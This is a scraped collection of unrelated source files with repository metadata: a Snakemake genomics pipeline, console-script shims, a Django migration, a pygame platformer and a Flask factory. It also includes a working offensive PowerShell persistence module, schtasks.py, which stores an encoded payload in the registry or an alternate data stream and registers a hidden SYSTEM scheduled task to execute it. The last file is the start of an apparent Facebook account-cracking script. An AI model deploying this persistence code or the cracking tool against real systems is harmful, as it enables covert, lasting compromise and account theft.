    input:
        # Here you need to add in your run name as it appears in the config file
        # You can have multiple runs
        #expand("{run_name}/{sample}/{sample}_count", run_name = "scATAC_190814", sample = config["scATAC_190814"]),
        #expand("{run_name}/{sample}/{sample}_count", run_name = "scATAC_190819", sample = config["scATAC_190819"])
        # If all runs have the same structure, use:
        expand("{sample}/outs", sample = config["samples"])
# Convenience target: counts against the no-haplotype reference.
rule count_wo_hap:
    input:
        expand("{sample}_no_hap/outs", sample = config["samples"])
# Convenience target: per-ATAC-cluster subset BAMs for every sample.
rule bam_clusters:
    input:
        expand("subset_bams/clusters/{sample}_cluster_{cluster}.bam", sample = config["samples"], cluster = CLUSTERS)
# Convenience target: subset BAMs split by RNA-derived cluster labels from config.
rule bam_RNA_clusters:
    input:
        expand("subset_bams/RNA_clusters/{sample}_cluster_{cluster}.bam", sample = config["samples"], cluster = config["RNA_clusters"])
# Demultiplex one run's raw BCLs into FASTQs with cellranger-atac mkfastq.
# The shell cd's into the run folder first, so the *P params are relative paths.
# Note: the old mkfastq output is removed (`rm -r`) before re-running.
rule mkfastq:
    input:
        runDir="{run_name}/{run_name}_raw_data",
        sampleSheet="{run_name}/{run_name}_barcodes.csv"
    output:
        directory("{run_name}/{run_name}_mkfastq/outs/fastq_path")
    params:
        sampleID="{run_name}_mkfastq",
        sampleName="{run_name}",
        runDirP="{run_name}_raw_data",
        sampleSheetP="{run_name}_barcodes.csv"
    threads: 30
    shell:
        """
        module load biology
        module load bcl2fastq/2.20
        cd {params.sampleName}
        rm -r {params.sampleID}
        cellranger-atac mkfastq --run={params.runDirP} --samplesheet={params.sampleSheetP} --id={params.sampleID} --localcores={threads} --qc
        cd ..
        """
# Run cellranger-atac count against the haplotype-containing reference.
# NOTE(review): the shell uses --id={sample}, which writes to "{sample}/outs",
# but the declared output is "{sample}_w_hap/outs" -- confirm which directory
# is actually produced/intended (rule count_no_hap below is self-consistent).
rule count:
    input:
        fastq_file=expand("{run_name}/{run_name}_mkfastq/outs/fastq_path", run_name = config["run_names"]),
        #fastq_file=make_fastq_list,
        ref=config['reference']
    output: directory("{sample}_w_hap/outs")
    params:
        sampleID="{sample}",
        sampleName="{sample}",
        mem=config['mem'],
        fastq_files=make_fastq_list
    threads: 30
    shell:
        """
        cellranger-atac count --id={params.sampleID} --fastqs={params.fastq_files} --sample={params.sampleName} --reference={input.ref} --localcores={threads} --localmem={params.mem}
        """
# Run cellranger-atac count against the no-haplotype reference; output id and
# declared output directory are consistent here ({sample}_no_hap/outs).
rule count_no_hap:
    input:
        fastq_file=expand("{run_name}/{run_name}_mkfastq/outs/fastq_path", run_name = config["run_names"]),
        #fastq_file=make_fastq_list,
        ref=config['no_hap_reference']
    output: directory("{sample}_no_hap/outs")
    params:
        sampleID="{sample}_no_hap",
        sampleName="{sample}",
        mem=config['mem'],
        fastq_files=make_fastq_list
    threads: 30
    shell:
        """
        cellranger-atac count --id={params.sampleID} --fastqs={params.fastq_files} --sample={params.sampleName} --reference={input.ref} --localcores={threads} --localmem={params.mem}
        """
# Extract the reads belonging to one cluster's cell barcodes from a sample BAM
# using 10x's subset-bam tool.
# NOTE(review): the BAM path hard-codes a "_no_hap_1" suffix that no rule in
# this file declares as output -- confirm that directory exists externally.
rule subset_bam:
    input:
        cell_file = "ArchR_analysis_scg4/Tonsils_harmony/files/{cluster_type}/{sample}_cluster_{cluster}.tsv",
        bam_file = "{sample}_no_hap_1/outs/possorted_bam.bam"
    output:
        out_bam = "subset_bams/{cluster_type}/{sample}_cluster_{cluster}.bam"
    threads: 10
    shell:
        """
        subset-bam --bam={input.bam_file} --cell-barcodes={input.cell_file} --cores={threads} --out-bam={output.out_bam}
        """
| [
"kwells4@stanford.edu"
] | kwells4@stanford.edu | |
a16f328dd2cb0803be2c8147bb5eb9e368e730f3 | c8bca1efec748f91aa1203010d1fbcc95ecf0df1 | /venv/src/BlogHunter/venv/Scripts/pip3-script.py | 19d2b716f23468d75c7b16ca950bad0b78e4b996 | [] | no_license | Shadab420/BlogHunter | b3e4be34ccfb68a4027cec6728ebf19da4a499a1 | 2cc23dcd33675600ee620eeb607c1fd62496a057 | refs/heads/master | 2020-05-20T02:29:56.775188 | 2019-05-07T13:31:23 | 2019-05-07T13:31:23 | 185,332,167 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #!G:\my_projects\Web-Apps\PY-Django-projects\venv\src\BlogHunter\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
# Auto-generated setuptools console-script wrapper: strips the platform
# wrapper suffix (-script.py / .exe) from argv[0], then hands control to
# pip's 'pip3' entry point. Regenerated on (re)install -- do not hand-edit.
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
    )
| [
"shadab_anwar@outlook.com"
] | shadab_anwar@outlook.com |
aaed02e64433a4bf43522a02ca8dab7afed13952 | 4735f992d44c40f3b3c595d25b5d2169aca63451 | /apps/standards/app_pipeline/migrations/0003_auto_20180530_1206.py | 29aeb2d19d87cc9c4e60a5e2c2da28ef014a8de3 | [
"MIT"
] | permissive | lulzzz/Plan | 11dec989e079e080c3b38a5347d19bf243c3bdf5 | 4c665aa7f764184a31a7cb4ec0de08cecad3ee3a | refs/heads/master | 2020-03-23T10:59:24.494710 | 2018-06-28T07:03:39 | 2018-06-28T07:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-05-30 04:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (Django 1.11.6, see file header).
    # Adds Metadata.sheet_name and alters database_table (now unique) and
    # filename field definitions on app_pipeline.Metadata.
    # Generated code: prefer regenerating via `makemigrations` over hand edits.

    dependencies = [
        ('app_pipeline', '0002_auto_20180528_2219'),
    ]

    operations = [
        migrations.AddField(
            model_name='metadata',
            name='sheet_name',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='metadata',
            name='database_table',
            field=models.CharField(max_length=100, unique=True),
        ),
        migrations.AlterField(
            model_name='metadata',
            name='filename',
            field=models.CharField(max_length=100),
        ),
    ]
| [
"florian.gamper@datacrag.com"
] | florian.gamper@datacrag.com |
bdb1769291b0eb7eaa1c52f8234aa8806de31199 | fc58366ed416de97380df7040453c9990deb7faa | /tools/dockerize/webportal/usr/share/openstack-dashboard/openstack_dashboard/dashboards/admin/zones/images/forms.py | d66f6a73b791797eb062a03977c79ce131fd57e7 | [
"Apache-2.0"
] | permissive | foruy/openflow-multiopenstack | eb51e37b2892074234ebdd5b501b24aa1f72fb86 | 74140b041ac25ed83898ff3998e8dcbed35572bb | refs/heads/master | 2016-09-13T08:24:09.713883 | 2016-05-19T01:16:58 | 2016-05-19T01:16:58 | 58,977,485 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import exceptions
from openstack_dashboard import api
class RebuildForm(forms.SelfHandlingForm):
    """Self-handling Horizon form that triggers an image rebuild for a zone."""

    def handle(self, request, data):
        """Rebuild images for the zone this form was initialised with.

        Always returns True; failures are surfaced to the user through
        horizon's exception handler rather than propagating.
        """
        zone_id = self.initial['zone_id']
        try:
            api.proxy.image_rebuild(request, zone_id)
        except Exception:
            exceptions.handle(request, _('Unable to rebuild images.'))
        return True
| [
"wenxiang.wang1204@gmail.com"
] | wenxiang.wang1204@gmail.com |
284d6deab8454d9a2b67f62d9f0d175f81f7a40e | 5ed917ada5766c0a028914f2c15549b6a9095b53 | /pyt/bin/jupyter-run | e4ec181cf191420b70e1674aa991452d2b6a3d3a | [] | no_license | shreyanshu007/backup | eb53c3cc44b17e1bcaa42ff2f46ea9364f1bcdfc | 5a0a4c9715375ae224db8c0f427f847022a9af02 | refs/heads/master | 2023-01-12T13:33:04.174671 | 2020-06-12T06:00:53 | 2020-06-12T06:00:53 | 201,099,769 | 0 | 0 | null | 2023-01-04T06:33:29 | 2019-08-07T17:46:24 | Python | UTF-8 | Python | false | false | 267 | #!/home/shreyanshu/sem_fir/pyt/bin/python3
# -*- coding: utf-8 -*-
# Auto-generated console-script shim for `jupyter run`: normalizes argv[0]
# (drops the -script.py / .exe wrapper suffix) and launches jupyter_client's
# RunApp. Regenerated on (re)install -- do not hand-edit.
import re
import sys
from jupyter_client.runapp import RunApp
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(RunApp.launch_instance())
| [
"2016csb1060@iitrpr.ac.in"
] | 2016csb1060@iitrpr.ac.in | |
e5cf83464f56094ca25471ffb0ca0ff6556b8a61 | 281d4e963b898b426e06ca3ccd45fd2dc107bf38 | /venv/bin/flask | f3825005348fc2f48ca7d92be1af68a5394c70af | [] | no_license | savigaur2/pokemon-data-analysis | c45835e424dd19e3065e04dc97839d3ffd56e154 | 428f66820f3c2f3f378ac79391c8217fec1358de | refs/heads/main | 2023-01-15T23:01:26.930953 | 2020-11-22T03:50:38 | 2020-11-22T03:50:38 | 313,149,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/apple/Documents/DataScienceProjects/PokemonDataAnalysis/api/venv/bin/python
# -*- coding: utf-8 -*-
# Auto-generated console-script shim for the `flask` CLI: normalizes argv[0]
# (drops the -script.py / .exe wrapper suffix) and runs flask.cli.main.
# Regenerated on (re)install -- do not hand-edit.
import re
import sys
from flask.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"apple@Apples-MacBook-Pro.local"
] | apple@Apples-MacBook-Pro.local | |
15b1a1d4f9ebb15aa6436c196700db433477e5fb | 346c3cba30bb3cfcdbae76d0f4ad551ff8612ace | /Game_class.py | 17c08316ab635ec293bf70d71a45e2c82561f815 | [] | no_license | Grantrd/P0_Final_Project_Grantr | 08bddd8df8e2d7ba8d845f474a21a79c9611c017 | 793ab9fd8854cd1953b5df406dad92726f623fdc | refs/heads/master | 2021-08-28T11:46:46.809809 | 2017-12-12T04:46:11 | 2017-12-12T04:46:11 | 110,902,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | ######################################################################
# Author: Rodney Grant
# Username: GrantR
#
# Assignment: P0_Final
#
# Purpose: To demonstrate my knowledge of programming and make a fun Mario Clone
# ###############################################################################
from pygame import *
from hero_class import*
import platform_class
from enemy_class import *
import unittest
"""Method Allows the game to take player input and use it to move the player"""
def player_input(event, floor, hero_y, jump, x_change, y_change):
    """Translate one pygame event into updated (x_change, y_change) speeds.

    Left/right arrows set horizontal speed (+/-5). Space starts a jump
    (y_change = -10) only when the hero is within 10px of the floor and not
    already airborne. Releasing an arrow stops horizontal motion; releasing
    space while airborne starts the fall (y_change = 5).
    """
    if event.type == pygame.KEYDOWN:
        if event.key == pygame.K_LEFT:
            x_change = -5
        if event.key == pygame.K_RIGHT:
            x_change = 5
        if hero_y >= (floor - 10):
            if event.key == pygame.K_SPACE:
                if not jump:
                    y_change = -10
        else:
            # NOTE(review): this else pairs with the floor-proximity check, so
            # ANY keydown while airborne forces y_change = 10 (fast fall) --
            # confirm that is the intended behaviour.
            y_change = 10
    elif event.type == pygame.KEYUP:
        if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
            x_change = 0
        if event.key == pygame.K_SPACE:
            if jump:
                y_change = 5
    return x_change, y_change
def gravity(floor, hero, jump, x_change, y_change):
    """Apply one frame of physics: move the hero via hero.jumpable(), then
    recompute whether he is airborne and clamp him to the floor.

    Returns the new airborne flag (the incoming `jump` value is ignored).
    """
    hero.jumpable(x_change, y_change, floor)
    # Airborne exactly when strictly above the floor (smaller y = higher).
    airborne = hero.y < floor
    # Never let the hero sink below the floor line.
    if hero.y > floor:
        hero.y = floor
    return airborne
def winner(display_width, display_height, floor, gameDisplay, hero, one, textsurface, white):
    """Return True (and draw the victory screen) when the hero stands on
    platform `one` (floor == one.y) inside the coin zone (400 < x < 440,
    y < 280); otherwise return False without touching the display."""
    # Guard clauses: any failed condition means no win this frame.
    if floor != one.y:
        return False
    if not (400 < hero.x < 440):
        return False
    if hero.y >= 280:
        return False
    # Winning: clear the screen and show the congratulations text.
    gameDisplay.fill(white)
    gameDisplay.blit(textsurface, (int(display_width / 6 - 110), int(display_height / 2)))
    return True
def lose(display_width, floor, hero, snowman):
    """Resolve collisions and off-screen exits for one frame.

    hero.crash code 1 kills the hero (hero and floor move off-screen at
    -100); code 2 kills the snowman. Leaving the screen on either side also
    kills the hero. Returns the (possibly updated) floor height.
    """
    if hero.crash(snowman.x, snowman.y) == 1:
        # Hero loses: drop both the hero and the floor out of view.
        hero.y = -100
        floor = -100
    elif hero.crash(snowman.x, snowman.y) == 2:
        # Snowman is stomped: remove it from view instead.
        snowman.y = -100
    # Falling off either edge of the screen is also fatal for the hero.
    if hero.x > display_width or hero.x < -65:
        hero.y = -100
    return floor
def platform(floor, hero, one, two):
    """Return the floor height for the hero: the top of platform `one` or
    `two` when he is horizontally over it and not below it, otherwise the
    ground level 504. Platform `one` takes priority, matching the original
    if/elif ordering."""
    for ledge in (one, two):
        if ledge.x < hero.x < ledge.x + ledge.length and hero.y <= ledge.y:
            return ledge.y
    return 504
def testit(did_pass):
linenum = sys._getframe(1).f_lineno # Get the caller's line number.
if did_pass:
msg = "Game Test at line {0} ok.".format(linenum)
else:
msg = ("Game Test at line {0} FAILED.".format(linenum))
print(msg)
def game_test_suite(hero, gameDisplay, textsurface, one, snowman, two):
    """Exercise gravity/winner/lose/platform against known positions and
    report pass/fail through testit(). Mutates hero and snowman in place
    while positioning them for each scenario."""
    # -- gravity: on-floor vs airborne cases.
    hero.y = 504
    hero.x = 600
    testit(gravity(504, hero, True, -10, 0) == False)
    testit(gravity(504, hero, True, 0, -10) == True)
    testit(gravity(504, hero, True, 500, 0) == False)
    testit(gravity(504, hero, True, 0, 300) == True)
    # -- winner: outside then inside the coin zone.
    testit(winner(800, 600, 504, gameDisplay, hero, one, textsurface, (255, 255, 255)) == False)
    hero.x = 420
    hero.y = 278
    testit(winner(800, 600, 504, gameDisplay, hero, one, textsurface, (255, 255, 255)) == True)
    # -- lose: no collision, then off-screen / collision deaths.
    snowman.x = 100
    snowman.y = 504
    testit(lose(800, 504, hero, snowman) == 504)
    snowman.x = 600
    snowman.y = 504
    hero.y = 504
    hero.x = 600
    testit(lose(800, 504, hero, snowman) == -100)
    snowman.x = 300
    snowman.y = 504
    testit(lose(800, 504, hero, snowman) == -100)
    # -- platform: each platform's surface plus the default ground.
    hero.x = 350
    hero.y = 325
    testit(platform(504, hero, one, two) == 328)
    hero.x = 130
    hero.y = 405
    testit(platform(504, hero, one, two) == 407)
    hero.x = 300
    hero.y = 400
    testit(platform(504, hero, one, two) == 328)
    hero.x = 0
    hero.y = 0
    testit(platform(504, hero, one, two) == 407)
def main():
    # Game entry point: initialise pygame, run the frame loop until the
    # window is closed, the hero wins, or the hero dies, then run the
    # per-class test suites.
    """setup Screen"""
    pygame.init()
    display_width = 800
    display_height = 600
    pygame.font.init()
    myfont = pygame.font.SysFont('Comic Sans MS', 90)
    """Colors"""
    black = (0, 0, 0)
    white = (255, 255, 255)
    red = (255, 0, 0)
    blue = (0, 0, 255)
    green = (0, 255, 0)
    """setup Game"""
    coin = pygame.image.load('coin.png')
    gameDisplay = pygame.display.set_mode((display_width, display_height))
    pygame.display.set_caption('penguin_ario')
    clock = pygame.time.Clock()
    floor = int(.84 * display_height)  # ground level: 504 for a 600px-tall window
    """enemy - to be class"""
    hero = Hero('animal.png', gameDisplay, floor)
    snowman = Enemy('enemy.png', gameDisplay, display_height)
    """setup screen"""
    win = False
    x = int(display_width * 0.45)
    y = floor
    x_change = 0
    jump = False
    y_change = 0
    textsurface = myfont.render('Congratulations You win', False, (0, 0, 0))
    """game loop"""
    crashed = False
    while not crashed:
        # NOTE(review): the background image and platforms are re-created
        # every frame -- hoisting them out of the loop would avoid repeated
        # disk loads, but is left as-is here.
        background = pygame.image.load('background2.png').convert()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                crashed = True
            x_change, y_change = player_input(event, floor, hero.y, jump, x_change, y_change)
        """platforms, in progress"""
        one = platform_class.Platform(324, 328, 185, gameDisplay)
        two = platform_class.Platform(77, 407, 186, gameDisplay)
        """gameScreen"""
        hero.display()
        snowman.display(snowman.x)
        snowman.track(hero.x)
        """background"""
        gameDisplay.fill(white)
        gameDisplay.blit(background, [0, 0])
        snowman.display(snowman.x)
        snowman.track(hero.x)
        gameDisplay.blit(coin, (430, 270))
        """platform"""
        one.draw(white, 5)
        two.draw(white, 5)
        hero.display()
        """actors... Acting"""
        jump = gravity(floor, hero, jump, x_change, y_change)
        """Selects the necessary platform to make solid"""
        floor = platform(floor, hero, one, two)
        """Kills the enemy, or the penguin"""
        floor = lose(display_width, floor, hero, snowman)
        """ends the game loop"""
        crashed = hero.game_over()
        """Allows fish coin collecting and winning"""
        win = winner(display_width, display_height, floor, gameDisplay, hero, one, textsurface, green)
        """refresh screen"""
        pygame.display.update()
        if win:
            crashed = True
            pygame.time.delay(2000)
        """clock for ...something later"""
        clock.tick(60)
    pygame.quit()
    """end of game loop"""
    # NOTE(review): `one`/`two` below only exist if the loop body ran at
    # least once; a zero-iteration loop would raise NameError here.
    hero.hero_test_suite()
    one.platform_test_suite()
    two.platform_test_suite()
    snowman.enemy_test_suite()
    game_test_suite(hero, gameDisplay, textsurface, one, snowman, two)
main()
| [
"grantr@berea.edu"
] | grantr@berea.edu |
0066871fb2d3c40eea27833787de3a9206f8f37a | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/powershell/persistence/elevated/schtasks.py | 5874e2f11964b3771e9313b017de312179d76575 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 10,401 | py | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a payload (or script) using schtasks running as SYSTEM. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'OnLogon' : {
'Description' : 'Switch. Trigger script on user logon.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:\Software\Microsoft\Network\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a payload.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
onLogon = self.options['OnLogon']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.payloads.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if onLogon != '':
script += "schtasks /Create /F /RU system /SC ONLOGON /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" OnLogon trigger."
elif idleTime != '':
script += "schtasks /Create /F /RU system /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /RU system /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
| [
"noreply@github.com"
] | fengjixuchui.noreply@github.com |
9fd7820797926af217ed080242855aeaa1af1ff0 | 325fbb141e7deb05ad2074d63caacb60d68a8faf | /project/__init__.py | 7f2e35ac0e008ec9a0b0ed5bfb67db356630ed6e | [] | no_license | nbry/flask-boilerplate | c56f2731cb3d84927d6ab327453c3b83fda17f51 | a4a6b991366f433161e8cee4fa406c144121f170 | refs/heads/master | 2023-04-22T03:06:50.433599 | 2021-05-10T06:24:30 | 2021-05-10T06:24:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,579 | py | from flask import Flask
# Blueprints (for routes)
from project.routes import all_blueprints
# # Extensions (MANUAL ADDITIONS HERE)
# # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
# from project.all_extensions import db
# *****************************
# APPLICATION FACTORY
# *****************************
def create_app(config_file=None):
    """
    Application factory: create and configure a Flask app instance.

    :param config_file: path to a config file, relative to the instance
        folder, loaded via ``app.config.from_pyfile``. If ``None``, no
        config file is loaded (previously this crashed inside Flask with
        a TypeError when the default was used).
    :return: the configured :class:`~flask.Flask` application.
    """
    # instance_relative_config=True makes from_pyfile() resolve paths
    # against the instance/ folder rather than the package root.
    app = Flask(__name__, instance_relative_config=True)
    if config_file is not None:
        app.config.from_pyfile(config_file)

    # Bind all route blueprints declared in project.routes.
    register_blueprints(app)

    # # Initialize extensions and link to app
    # # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
    # initialize_extensions(app)

    return app
# *****************************
# INITIALIZING EXTENSIONS
# *****************************
# # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
# def initialize_extensions(app):
# """
# Pass Flask extensions to an instantiated Flask app.
# """
# db.init_app(app)
# *****************************
# REGISTERING BLUEPRINTS
# *****************************
def register_blueprints(app):
    """
    Attach every blueprint from ``project.routes`` to *app*.

    NOTE: project/routes/__init__.py must import all blueprints and
    expose them in a list named ``all_blueprints``; each entry in that
    list is registered here.
    """
    for bp in all_blueprints:
        app.register_blueprint(bp)
| [
"nwbryant@umich.edu"
] | nwbryant@umich.edu |
27fe391210aaace5f53aa25edb65d2c5d35e4512 | 45c43d1d7520ef4683feea30cc89428cedb08e0e | /uk3.py | cea9950755ee4c33b9ecc4ae76c02f298440e8c9 | [] | no_license | chotobhaiback/uk3 | dce20a838972b1673df855962e2663288e1ca9de | c2d7ff71e4db22a87924e7458b92ea21fa6b5135 | refs/heads/master | 2022-12-14T20:25:51.312387 | 2020-09-03T09:00:22 | 2020-09-03T09:00:22 | 292,518,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,586 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
